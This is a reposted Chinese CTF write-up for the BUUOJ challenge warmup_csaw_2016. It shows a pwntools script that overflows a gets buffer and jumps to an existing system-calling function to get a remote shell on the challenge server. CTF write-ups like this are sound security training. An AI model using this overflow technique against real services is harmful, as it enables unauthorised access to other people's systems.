码迷,mamicode.com
首页 > 其他好文 > 详细

buuoj warmup_csaw_2016

时间:2021-04-08 13:18:38      阅读:0      评论:0      收藏:0      [点我收藏+]

标签:imp   exp   ida   sys   class   python   com   lin   mic   

放进IDA,找到gets
技术图片
接收0x40位,然后查看字符串,虽然没有bin/sh,但是有能直接用的
技术图片
找到所在函数和地址
技术图片
exp:

from pwn import *

p=remote(‘node3.buuoj.cn‘,27180)
sys_addr=0x40060D
payload=‘a‘*(0x40+8)+p64(sys_addr)
p.sendline(payload)
p.interactive()

这里有个不太清楚的+8……不知道32和64下各应该在什么情况下加多少orz

buuoj warmup_csaw_2016

标签:imp   exp   ida   sys   class   python   com   lin   mic   

原文地址:https://www.cnblogs.com/diakla/p/14627138.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!